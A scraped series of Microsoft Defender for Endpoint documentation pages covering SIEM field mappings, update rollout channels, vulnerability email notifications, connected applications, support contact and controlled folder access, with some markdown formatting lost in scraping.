-| `LastProcessedTimeUtc` |->| `lastActivityDateTime` |
-| `ThreatCategory` |->| `mitreTechniques []` |
-| `ThreatFamilyName` |->| `threatFamilyName` |
-| `ThreatName` |->| `threatDisplayName` |
-| `RemediationAction` |->| `evidence: remediationStatus` |
-| `RemediationIsSuccess` |->| `evidence: remediationStatus (implied)` |
-| `Source` |->| `detectionSource (use with serviceSource: microsoftDefenderForEndpoint)` |
-| `Md5` | X | Not supported |
-| `Sha256` |->| `evidence/fileEvidence/fileDetails: sha256 (or evidence/processEvidence/imageFile: sha256)` |
-| `WasExecutingWhileDetected` |->| `evidence/processEvidence: detectionStatus` |
-| `UserDomain` |->| `evidence/userEvidence/userAccount: domainName` |
-| `LogOnUsers` |->| `evidence/deviceEvidence: loggedOnUsers []` |
-| `MachineDomain` |->| Included in `evidence/deviceEvidence: deviceDnsName` |
-| `MachineName` |->| Included in `evidence/deviceEvidence: deviceDnsName` |
-| `InternalIPV4List` | X | Not supported |
-| `InternalIPV6List` | X | Not supported |
-| `FileHash` |->| Use `sha1` or `sha256` |
-| `DeviceID` |->| `evidence/deviceEvidence: mdeDeviceId` |
-| `MachineGroup` |->| `evidence/deviceEvidence: rbacGroupName` |
-| `Description` |->| `description` |
-| `DeviceCreatedMachineTags` |->| `evidence: tags [] (for deviceEvidence)` |
-| `CloudCreatedMachineTags` |->| `evidence: tags [] (for deviceEvidence)` |
-| `CommandLine` | -> | `evidence/processEvidence: processCommandLine` |
-| `IncidentLinkToWDATP` |->| `incidentWebUrl` |
-| `ReportId` | X | Obsolete (Defender for Endpoint alerts are atomic/complete that are updatable, while the SIEM API were immutable records of detections) |
-| `LinkToMTP` |->| `alertWebUrl` |
-| `IncidentLinkToMTP` |->| `incidentWebUrl` |
-| `ExternalId` | X | Obsolete |
-| `IocUniqueId` | X | IoC fields not supported |
-
-## Ingest alerts using security information and events management (SIEM) tools
-
-> [!NOTE]
->
-> [Microsoft Defender for Endpoint Alert](alerts.md) is composed from one or more suspicious or malicious events that occurred on the device and their related details. The Microsoft Defender for Endpoint Alert API is the latest API for alert consumption and contains a detailed list of related evidence for each alert. For more information, see [Alert methods and properties](alerts.md) and [List alerts](get-alerts.md).
-
-Microsoft Defender for Endpoint supports security information and event management (SIEM) tools ingesting information from your enterprise tenant in Microsoft Entra ID using the OAuth 2.0 authentication protocol for a registered Microsoft Entra application representing the specific SIEM solution or connector installed in your environment.
-
-For more information, see:
--- [Microsoft Defender for Endpoint APIs license and terms of use](api-terms-of-use.md)-- [Access the Microsoft Defender for Endpoint APIs](apis-intro.md)-- [Hello World example (describes how to register an application in Microsoft Entra ID)](api-hello-world.md)-- [Get access with application context](exposed-apis-create-app-webapp.md)-- [Microsoft Defender XDR SIEM integration](../defender/configure-siem-defender.md)
security Configure Updates https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-updates.md
- Title: Create a custom gradual rollout process for Microsoft Defender updates
-description: Learn how to use supported tools to create a custom gradual rollout process for updates
--- NOCSH------ m365-security-- tier2- Previously updated : 01/12/2024--
-# Create a custom gradual rollout process for Microsoft Defender updates
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-> [!NOTE]
-> This functionality requires Microsoft Defender Antivirus version 4.18.2106.X or newer.
-
-To create your own custom gradual rollout process for Defender updates, you can use Group Policy, Intune, and PowerShell.
-
-The following table lists the available group policy settings for configuring update channels:
-
-|Setting title|Description|Location|
-||||
-|Select gradual Microsoft Defender monthly platform update rollout channel|Enable this policy to specify when devices receive Microsoft Defender platform updates during the monthly gradual rollout. <p> Beta Channel: Devices set to this channel are the first to receive new updates. Select Beta Channel to participate in identifying and reporting issues to Microsoft. Devices in the Windows Insider Program are subscribed to this channel by default. For use in (manual) test environments only and a limited number of devices. <p> Current Channel (Preview): Devices set to this channel are offered updates earliest during the monthly gradual release cycle. Suggested for pre-production/validation environments. <p> Current Channel (Staged): Devices are offered updates after the monthly gradual release cycle. Suggested to apply to a small, representative part of your production population (~10%). <p> Current Channel (Broad): Devices are offered updates only after the gradual release cycle completes. Suggested to apply to a broad set of devices in your production population (~10-100%). <p> Critical- Time Delay: Devices are offered updates with a 48-hour delay. Suggested for critical environments only. <p>If you disable or don't configure this policy, the device stays up to date automatically during the gradual release cycle. Suitable for most devices.|Windows Components\Microsoft Defender Antivirus|
-|Select gradual Microsoft Defender monthly engine update rollout channel|Enable this policy to specify when devices receive Microsoft Defender engine updates during the monthly gradual rollout. <p> Beta Channel: Devices set to this channel are the first to receive new updates. Select Beta Channel to participate in identifying and reporting issues to Microsoft. Devices in the Windows Insider Program are subscribed to this channel by default. For use in (manual) test environments only and a limited number of devices. <p> Current Channel (Preview): Devices set to this channel are offered updates earliest during the monthly gradual release cycle. Suggested for pre-production/validation environments. <p> Current Channel (Staged): Devices are offered updates after the monthly gradual release cycle. Suggested to apply to a small, representative part of your production population (~10%). <p> Current Channel (Broad): Devices are offered updates only after the gradual release cycle completes. Suggested to apply to a broad set of devices in your production population (~10-100%). <p> Critical- Time Delay: Devices are offered updates with a 48-hour delay. Suggested for critical environments only.<p> If you disable or don't configure this policy, the device stays up to date automatically during the gradual release cycle. Suitable for most devices.|Windows Components\Microsoft Defender Antivirus|
-|Select gradual Microsoft Defender daily security intelligence updates rollout channel|Enable this policy to specify when devices receive Microsoft Defender security intelligence updates during the daily gradual rollout. <p> Current Channel (Staged): Devices are offered updates after the release cycle. Suggested to apply to a small, representative part of production population (~10%). <p> Current Channel (Broad): Devices are offered updates only after the gradual release cycle completes. Suggested to apply to a broad set of devices in your production population (~10-100%). <p> If you disable or don't configure this policy, the device stays up to date automatically during the daily release cycle. Suitable for most devices.|Windows Components\Microsoft Defender Antivirus|
-|Disable gradual rollout of Microsoft Defender updates|Enable this policy to disable gradual rollout of Defender updates. <p> Current Channel (Broad): Devices set to this channel are offered updates last during the gradual release cycle. Best for datacenter machines that only receive limited updates. <p> Note: This setting applies to both monthly and daily Defender updates and overrides any previously configured channel selections for platform and engine updates. <p> If you disable or don't configure this policy, the device remains in Current Channel (Default) unless specified otherwise in specific channels for platform and engine updates. Stay up to date automatically during the gradual release cycle. Suitable for most devices.|Windows Components\Microsoft Defender Antivirus\MpEngine|
--
-## Group Policy
-
-> [!NOTE]
-> An updated Defender ADMX template are published together with the 21H2 release of Windows 10. A non-localized version is available for download at [defender-updatecontrols](https://github.com/microsoft/defender-updatecontrols) on GitHub.
-
-You can use [Group Policy](/windows/win32/srvnodes/group-policy?redirectedfrom=MSDN) to configure and manage Microsoft Defender Antivirus on your endpoints.
-
-In general, you can use the following procedure to configure or change Microsoft Defender Antivirus group policy settings:
-
-1. On your Group Policy management machine, open the **Group Policy Management Console**, right-click the **Group Policy Object** (GPO) you want to configure and select **Edit**.
-
-2. Using the Group Policy Management Editor go to **Computer configuration**.
-
-3. Select **Administrative templates**.
-
-4. Expand the tree to **Windows components > Microsoft Defender Antivirus**.
-
-5. Expand the section (referred to as **Location** in the table in this article) that contains the setting you want to configure, double-click the setting to open it, and make configuration changes.
-
-6. [Deploy the updated GPO as you normally do](https://msdn.microsoft.com/library/ee663280(v=vs.85).aspx).
-
-## Intune
-
-Follow the instructions in below link to create a custom policy in Intune:
-
-[Add custom settings for Windows 10 devices in Microsoft Intune](/mem/intune/configuration/custom-settings-windows-10).
-
-For more information on the Defender CSP used for the gradual rollout process, see [Defender CSP](/windows/client-management/mdm/defender-csp).
-
-## PowerShell
-
-Use the `Set-MpPreference` cmdlet to configure roll out of the gradual updates.
-
-Use the following parameters:
-
-```powershell
-Set-MpPreference
--PlatformUpdatesChannel Beta|Preview|Staged|Broad|Delayed|NotConfigured--EngineUpdatesChannel Beta|Preview|Staged|Broad|Delayed|NotConfigured--DisableGradualRelease 1|0--DefinitionUpdatesChannel Staged|Broad|NotConfigured
-```
-
-Example:
-
-Use `Set-MpPreference -PlatformUpdatesChannel Beta` to configure platform updates to arrive from the Beta Channel.
-
-For more information on the parameters and how to configure them, see [Set-MpPreference](/powershell/module/defender/set-mppreference) (Microsoft Defender Antivirus).
-
-> [!NOTE]
-> You can also use a management tool such as Microsoft Configuration Manager to run PowerShell scripts. See [Create and run PowerShell scripts from the Configuration Manager console](/mem/configmgr/apps/deploy-use/create-deploy-scripts) for guidance on this topic.
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-
security Configure Vulnerability Email Notifications https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-vulnerability-email-notifications.md
- Title: Configure vulnerability email notifications in Microsoft Defender for Endpoint
-description: Use Microsoft Defender for Endpoint to configure email notification settings for vulnerability events.
------- m365-security-- tier2- Previously updated : 02/02/2021--
-# Configure vulnerability email notifications in Microsoft Defender for Endpoint
-
-**Applies to:**
-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](../defender-business/mdb-overview.md)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-emailconfig-abovefoldlink)
-
-Configure Microsoft Defender for Endpoint to send email notifications to specified recipients for new vulnerability events. This feature enables you to identify a group of individuals who will immediately be informed and can act on the notifications based on the event. The vulnerability information comes from [Microsoft Defender Vulnerability Management](next-gen-threat-and-vuln-mgt.md).
-
-If you're using [Defender for Business](../defender-business/mdb-overview.md), you can set up vulnerability notifications for specific users (not roles or groups).
-
-> [!NOTE]
-> - Only users with 'Manage security settings' permissions can configure email notifications. If you've chosen to use basic permissions management, users with Security Administrator or Global Administrator roles can configure email notifications. [Learn more about permission options](user-roles.md)
-> - Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-The notification rules allow you to set the vulnerability events that trigger notifications, and add or remove email notification recipients. New recipients get notified about vulnerabilities after they're added.
-
-If you're using role-based access control (RBAC), recipients will only receive notifications based on the device groups that were configured in the notification rule. Users with the proper permission can only create, edit, or delete notifications that are limited to their device group management scope. Only users assigned to the Global administrator role can manage notification rules that are configured for all device groups.
-
-The email notification includes basic information about the vulnerability event. There are also links to filtered views in the Defender Vulnerability Management [Security recommendations](tvm-security-recommendation.md) and [Weaknesses](tvm-weaknesses.md) pages in the portal so you can further investigate. For example, you could get a list of all exposed devices or get additional details about the vulnerability.
-
-## Create rules for alert notifications
-
-Create a notification rule to send an email when there are certain exploit or vulnerability events, such as a new public exploit. For each rule, multiple event types can be selected.
-
-1. Go to [Microsoft Defender XDR](https://go.microsoft.com/fwlink/p/?linkid=2077139) and sign in using an account with the Security administrator or Global administrator role assigned.
-
-2. In the navigation pane, go to **Settings** \> **Endpoints** \> **Email notifications** \> **Vulnerabilities**.
-
-2. Select **Add notification rule**.
-
-3. Name the email notification rule and include a description.
-
-4. Check **Activate notification rule**. Select **Next**
-
-5. Fill in the notification settings. Then select **Next**
-
- - If you're using Defender for Endpoint, choose device groups to get notifications for. (If you're using [Defender for Business](../defender-business/mdb-overview.md), device groups don't apply.)
- - Choose the vulnerability event(s) that you want to be notified about when they affect your organization:
- - New vulnerability found (including severity threshold)
-
- > [!NOTE]
- > This includes newly detected [zero-day vulnerabilities](tvm-zero-day-vulnerabilities.md) and patches released for existing zero-day vulnerabilities. For more information, see [patching zero-day vulnerabilities](tvm-zero-day-vulnerabilities.md#patching-zero-day-vulnerabilities).
-
- - Exploit was verified
- - New public exploit
- - Exploit added to an exploit kit
-
- - Include organization name if you want the organization name in the email.
-
-6. Enter the recipient email address then select **Add**. You can add multiple email addresses.
-
-7. Review the settings for the new email notification rule and select **Create rule** when you're ready to create it.
-
-## Edit a notification rule
-
-1. Select the notification rule you'd like to edit.
-
-2. Select the **Edit rule** button next to the pencil icon in the flyout. Make sure you have permission to edit or delete the rule.
-
-## Delete notification rule
-
-1. Select the notification rule you'd like to delete.
-
-2. Select the **Delete** button next to the trash can icon in the flyout. Make sure you have permission to edit or delete the rule.
-
-## Troubleshoot email notifications for alerts
-
-This section lists various issues that you may encounter when using email notifications for alerts.
-
-**Problem:** Intended recipients report they aren't getting the notifications.
-
-**Solution:** Make sure that the notifications aren't blocked by email filters:
-
-1. Check that the Defender for Endpoint email notifications aren't sent to the Junk Email folder. Mark them as Not junk.
-2. Check that your email security product isn't blocking the email notifications from Defender for Endpoint.
-3. Check your email application rules that might be catching and moving your Defender for Endpoint email notifications.
-
-## Related articles
--- [Defender Vulnerability Management overview](next-gen-threat-and-vuln-mgt.md)-- [Security recommendations](tvm-security-recommendation.md)-- [Weaknesses](tvm-weaknesses.md)-- [Event timeline](threat-and-vuln-mgt-event-timeline.md)
security Connected Applications https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/connected-applications.md
- Title: Connected applications in Microsoft Defender for Endpoint-
-description: View connected partner applications that use standard OAuth 2.0 protocol to authenticate and provide tokens for use with Microsoft Defender for Endpoint APIs.
------- m365-security-- tier2-- Previously updated : 12/18/2020--
-# Connected applications in Microsoft Defender for Endpoint
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)--
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-assignaccess-abovefoldlink)
-
-Connected applications integrates with the Defender for Endpoint platform using APIs.
-
-Applications use standard OAuth 2.0 protocol to authenticate and provide tokens for use with Microsoft Defender for Endpoint APIs. In addition, Microsoft Entra applications allow tenant admins to set explicit control over which APIs can be accessed using the corresponding app.
-
-You'll need to follow [these steps](/microsoft-365/security/defender-endpoint/apis-intro) to use the APIs with the connected application.
-
-From the left navigation menu, select **Partners & APIs** (under **Endpoints**) > **Connected applications**.
-
-## View connected application details
-
-The Connected applications page provides information about the Microsoft Entra applications connected to Microsoft Defender for Endpoint in your organization. You can review the usage of the connected applications: last seen, number of requests in the past 24 hours, and request trends in the last 30 days.
-
-
-## Edit, reconfigure, or delete a connected application
-
-The **Open application settings** link opens the corresponding Microsoft Entra application management page in the Azure portal. From the Azure portal, you can manage permissions, reconfigure, or delete the connected applications.
security Contact Support https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/contact-support.md
- Title: Contact Microsoft Defender for Endpoint support
-description: Learn how to contact Microsoft Defender for Endpoint support
------- m365-security-- tier2- Previously updated : 12/18/2020--
-# Contact Microsoft Defender for Endpoint support
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-assignaccess-abovefoldlink)
-
-Defender for Endpoint has recently upgraded the support process to offer a more modern and advanced support experience.
-
-The new widget allows customers to:
--- Find solutions to common problems-- Submit a support case to the Microsoft support team-
-## Prerequisites
-
-It's important to know the specific roles that have permission to open support cases.
-
-At a minimum, you must have a Service Support Administrator **OR** Helpdesk Administrator role.
-
-For more information on which roles have permission, see [Security Administrator permissions](/azure/active-directory/roles/permissions-reference#security-administrator).
-
-For general information on admin roles, see [About admin roles](/microsoft-365/admin/add-users/about-admin-roles?view=o365-worldwide&preserve-view=true).
-
-## Access the widget
-
-Accessing the new support widget can be done in one of two ways:
-
-1. Clicking on the question mark on the top right of the portal and then clicking on "Microsoft support":
-
- :::image type="content" source="../../media/contactsupport.png" alt-text="The Microsoft support icon in the Microsoft Defender portal" lightbox="../../media/contactsupport.png":::
-
-2. Clicking on the **Need help?** button in the bottom right of the Microsoft Defender portal:
-
- :::image type="content" source="media/need-help-option.png" alt-text="The Need help button" lightbox="media/need-help-option.png":::
-
-In the widget you'll be offered two options:
--- Find solutions to common problems-- Open a service request-
-## Find solutions to common problems
-
-This option includes articles that might be related to the question you may ask. Just start typing the question in the search box and articles related to your search will be surfaced.
--
-In case the suggested articles aren't sufficient, you can open a service request.
-
-## Open a service request
-
-Learn how to open support tickets by contacting Defender for Endpoint support.
-
-> [!NOTE]
-> If you have a premier support contract with Microsoft, you'll see the premier tag on the widget. If not, contact your Microsoft account manager.
-
-### Contact support
--
-1. Fill in a title and description for the issue you are facing, the phone number and email address where we may reach you.
-2. (Optional) Include up to five attachments that are relevant to the issue to provide additional context for the support case.
-3. Select your time zone and an alternative language, if applicable. The request will be sent to Microsoft Support Team. The team will respond to your service request shortly.
-
-## Related topics
--- [Troubleshoot service issues](troubleshoot-mdatp.md)-- [Check service health](/microsoft-365/enterprise/view-service-health)
security Controlled Folders https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/controlled-folders.md
- Title: Protect important folders from ransomware from encrypting your files with controlled folder access
-description: Files in default folders can be protected from being changed by malicious apps. Prevent ransomware from encrypting your files.
- Previously updated : 03/05/2024---------- m365-security-- tier2-- mde-asr--
-# Protect important folders with controlled folder access
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- Microsoft Defender Antivirus-
-**Applies to**
-- Windows--
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-assignaccess-abovefoldlink)
-
-## What is controlled folder access?
-
-Controlled folder access helps protect your valuable data from malicious apps and threats, such as ransomware. Controlled folder access protects your data by checking apps against a list of known, trusted apps. Supported on Windows Server 2012 R2, Windows Server 2016, Windows Server 2019, Windows Server 2022, Windows 10, and Windows 11 clients, controlled folder access can be turned on using the Windows Security App, Microsoft Endpoint Configuration Manager, or Intune (for managed devices).
-
-> [!NOTE]
-> Scripting engines are not trusted and you cannot allow them access to controlled protected folders. For example, PowerShell is not trusted by controlled folder access, even if you allow with [certificate and file indicators](/microsoft-365/security/defender-endpoint/indicator-certificates).
-
-Controlled folder access works best with [Microsoft Defender for Endpoint](microsoft-defender-endpoint.md), which gives you detailed reporting into controlled folder access events and blocks as part of the usual [alert investigation scenarios](investigate-alerts.md).
-
-> [!TIP]
-> Controlled folder access blocks don't generate alerts in the [Alerts queue](alerts-queue.md). However, you can view information about controlled folder access blocks in the [device timeline view](investigate-machines.md), while using [advanced hunting](advanced-hunting-overview.md), or with [custom detection rules](custom-detection-rules.md).
-
-## How does controlled folder access work?
-
-Controlled folder access works by only allowing trusted apps to access protected folders. Protected folders are specified when controlled folder access is configured. Typically, commonly used folders, such as those used for documents, pictures, downloads, and so on, are included in the list of controlled folders.
-
-Controlled folder access works with a list of trusted apps. Apps that are included in the list of trusted software work as expected. Apps that are not included in the list are prevented from making any changes to files inside protected folders.
-
-Apps are added to the list based upon their prevalence and reputation. Apps that are highly prevalent throughout your organization and that have never displayed any behavior deemed malicious are considered trustworthy. Those apps are added to the list automatically.
-
-Apps can also be added manually to the trusted list by using Configuration Manager or Intune. Additional actions can be performed from the Microsoft Defender portal.
-
-## Why controlled folder access is important
-
-Controlled folder access is especially useful in helping to protect your documents and information from [ransomware](https://www.microsoft.com/wdsi/threats). In a ransomware attack, your files can get encrypted and held hostage. With controlled folder access in place, a notification appears on the computer where an app attempted to make changes to a file in a protected folder. You can [customize the notification](attack-surface-reduction-rules-deployment-implement.md#customize-attack-surface-reduction-rules) with your company details and contact information. You can also enable the rules individually to customize what techniques the feature monitors.
-
-The [protected folders](#review-controlled-folder-access-events-in-windows-event-viewer) include common system folders (including boot sectors), and you can [add more folders](customize-controlled-folders.md#protect-additional-folders). You can also [allow apps](customize-controlled-folders.md#allow-specific-apps-to-make-changes-to-controlled-folders) to give them access to the protected folders.
-
-You can use [audit mode](audit-windows-defender.md) to evaluate how controlled folder access would impact your organization if it were enabled.
-
-Controlled folder access is supported on the following versions of Windows:
--- [Windows 10, version 1709](/windows/whats-new/whats-new-windows-10-version-1709) and later-- Windows 11-- Windows 2012 R2-- Windows 2016-- [Windows Server 2019](/windows-server/get-started-19/whats-new-19)-- Windows Server 2022-
-## Windows system folders are protected by default
-
-Windows system folders are protected by default, along with several other folders:
-
-The protected folders include common system folders (including boot sectors), and you can add additional folders. You can also allow apps to give them access to the protected folders. The Windows systems folders that are protected by default are:
--- `c:\Users\<username>\Documents`-- `c:\Users\Public\Documents`-- `c:\Users\<username>\Pictures`-- `c:\Users\Public\Pictures`-- `c:\Users\Public\Videos`-- `c:\Users\<username>\Videos`-- `c:\Users\<username>\Music`-- `c:\Users\Public\Music`-- `c:\Users\<username>\Favorites`-
-Default folders appear in the user's profile, under **This PC**.
- > [!div class="mx-imgBorder"]
- > ![Protected Windows default systems folders](media/defaultfolders.png)
-
-> [!NOTE]
-> You can configure additional folders as protected, but you cannot remove the Windows system folders that are protected by default.
-
-## Requirements for controlled folder access
-
-Controlled folder access requires enabling [Microsoft Defender Antivirus real-time protection](configure-real-time-protection-microsoft-defender-antivirus.md).
-
-<a name='review-controlled-folder-access-events-in-the-microsoft-365-defender-portal'></a>
-
-## Review controlled folder access events in the Microsoft Defender portal
-
-Defender for Endpoint provides detailed reporting into events and blocks as part of its [alert investigation scenarios](investigate-alerts.md) in the Microsoft Defender portal; see [Microsoft Defender for Endpoint in Microsoft Defender XDR](../defender/microsoft-365-security-center-mde.md).
-
-You can query Microsoft Defender for Endpoint data by using [Advanced hunting](advanced-hunting-overview.md). If you're using [audit mode](audit-windows-defender.md), you can use [advanced hunting](advanced-hunting-overview.md) to see how controlled folder access settings would affect your environment if they were enabled.
-
-Example query:
-
-```PowerShell
-DeviceEvents
-| where ActionType in ('ControlledFolderAccessViolationAudited','ControlledFolderAccessViolationBlocked')
-```
-
-## Review controlled folder access events in Windows Event Viewer
-
-You can review the Windows event log to see events that are created when controlled folder access blocks (or audits) an app:
-
-1. Download the [Evaluation Package](https://aka.ms/mp7z2w) and extract the file *cfa-events.xml* to an easily accessible location on the device.
-2. Type **Event viewer** in the Start menu to open the Windows Event Viewer.
-3. On the left panel, under **Actions**, select **Import custom view...**.
-4. Navigate to where you extracted *cfa-events.xml* and select it. Alternatively, [copy the XML directly](event-views.md).
-5. Select **OK**.
-
-The following table shows events related to controlled folder access:
-
-|Event ID|Description|
-|||
-|5007|Event when settings are changed|
-|1124|Audited controlled folder access event|
-|1123|Blocked controlled folder access event|
-|1127|Blocked controlled folder access sector write block event|
-|1128|Audited controlled folder access sector write block event|
-
-## View or change the list of protected folders
-
-You can use the Windows Security app to view the list of folders that are protected by controlled folder access.
-
-1. On your Windows 10 or Windows 11 device, open the Windows Security app.
-2. Select **Virus & threat protection**.
-3. Under **Ransomware protection**, select **Manage ransomware protection**.
-4. If controlled folder access is turned off, you'll need to turn it on. Select **protected folders**.
-5. Do one of the following steps:
- - To add a folder, select **+ Add a protected folder**.
- - To remove a folder, select it, and then select **Remove**.
-
-> [!NOTE]
-> [Windows system folders](#windows-system-folders-are-protected-by-default) are protected by default, and you cannot remove them from the list. Subfolders are also included in protection when you add a new folder to the list.
security Customize Controlled Folders https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/customize-controlled-folders.md
- Title: Customize controlled folder access
-description: Add other folders that should be protected by controlled folder access, or allow apps that are incorrectly blocking changes to important files.
---------- m365-security-- tier2-- mde-asr Previously updated : 10/27/2023--
-# Customize controlled folder access
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-> [!TIP]
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-assignaccess-abovefoldlink)
-
-Controlled folder access helps you protect valuable data from malicious apps and threats, such as ransomware. Controlled folder access is supported on Windows Server 2019, Windows Server 2022, Windows 10, and Windows 11 clients. This article describes how to customize controlled folder access capabilities, and includes the following sections:
--- [Protect additional folders](#protect-additional-folders)-- [Add apps that should be allowed to access protected folders](#allow-specific-apps-to-make-changes-to-controlled-folders)-- [Allow signed executable files to access protected folders](#allow-signed-executable-files-to-access-protected-folders)-- [Customize the notification](#customize-the-notification)-
-> [!IMPORTANT]
-> Controlled folder access monitors apps for activities that are detected as malicious. Sometimes, legitimate apps are blocked from making changes to your files. If controlled folder access impacts your organization's productivity, you might consider running this feature in [audit mode](audit-windows-defender.md) to fully assess the impact.
-
-## Protect additional folders
-
-Controlled folder access applies to many system folders and default locations, including folders such as **Documents**, **Pictures**, and **Movies**. You can add other folders to be protected, but you cannot remove the default folders in the default list.
-
-Adding other folders to controlled folder access can be helpful for cases when you don't store files in the default Windows libraries, or you've changed the default location of your libraries.
-
-You can also specify network shares and mapped drives. Environment variables are supported; however, wildcards are not.
-
-You can use the Windows Security app, Group Policy, PowerShell cmdlets, or mobile device management configuration service providers to add and remove protected folders.
-
-### Use the Windows Security app to protect additional folders
-
-1. Open the Windows Security app by selecting the shield icon in the task bar, or by searching for *security* in the Start menu.
-
-2. Select **Virus & threat protection**, and then scroll down to the **Ransomware protection** section.
-
-3. Select **Manage ransomware protection** to open the **Ransomware protection** pane.
-
-4. Under the **Controlled folder access** section, select **Protected folders**.
-
-5. Choose **Yes** on the **User Access Control** prompt. The **Protected folders** pane displays.
-
-6. Select **Add a protected folder** and follow the prompts to add folders.
-
-### Use Group Policy to protect additional folders
-
-1. On your Group Policy management computer, open the [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731212(v=ws.11)?preserve=true).
-
-2. Right-click the Group Policy Object you want to configure, and then select **Edit**.
-
-3. In your **Group Policy Management Editor**, go to **Computer configuration** \> **Policies** \> **Administrative templates**.
-
-4. Expand the tree to **Windows components** \> **Microsoft Defender Antivirus** \> **Windows Defender Exploit Guard** \> **Controlled folder access**. <br/>**NOTE**: On older versions of Windows, you might see **Windows Defender Antivirus** instead of **Microsoft Defender Antivirus**.
-
-5. Double-click **Configured protected folders**, and then set the option to **Enabled**. Select **Show**, and specify each folder that you want to protect.
-
-6. Deploy your Group Policy Object as you usually do.
-
-### Use PowerShell to protect additional folders
-
-1. Type **PowerShell** in the Start menu, right-click **Windows PowerShell** and select **Run as administrator**
-
-2. Type the following PowerShell cmdlet, replacing `<the folder to be protected>` with the folder's path (such as `"c:\apps\"`):
-
- ```PowerShell
- Add-MpPreference -ControlledFolderAccessProtectedFolders "<the folder to be protected>"
- ```
-3. Repeat step 2 for each folder that you want to protect. Folders that are protected are visible in the Windows Security app.
-
- :::image type="content" source="medilet shown" lightbox="media/cfa-allow-folder-ps.png":::
-
-> [!IMPORTANT]
-> Use `Add-MpPreference` to append or add apps to the list and not `Set-MpPreference`. Using the `Set-MpPreference` cmdlet will overwrite the existing list.
-
-### Use MDM CSPs to protect additional folders
-
-Use the [./Vendor/MSFT/Policy/Config/Defender/GuardedFoldersList](/windows/client-management/mdm/policy-csp-defender#defender-guardedfolderslist) configuration service provider (CSP) to allow apps to make changes to protected folders.
-
-## Allow specific apps to make changes to controlled folders
-
-You can specify if certain apps are always considered safe and give write access to files in protected folders. Allowing apps can be useful if a particular app you know and trust is being blocked by the controlled folder access feature.
-
-> [!IMPORTANT]
-> By default, Windows adds apps that are considered friendly to the allowed list. Such apps that are added automatically are not recorded in the list shown in the Windows Security app or by using the associated PowerShell cmdlets. You shouldn't need to add most apps. Only add apps if they are being blocked and you can verify their trustworthiness.
-
-When you add an app, you have to specify the app's location. Only the app in that location will be permitted access to the protected folders. If the app (with the same name) is in a different location, it will not be added to the allowlist and may be blocked by controlled folder access.
-
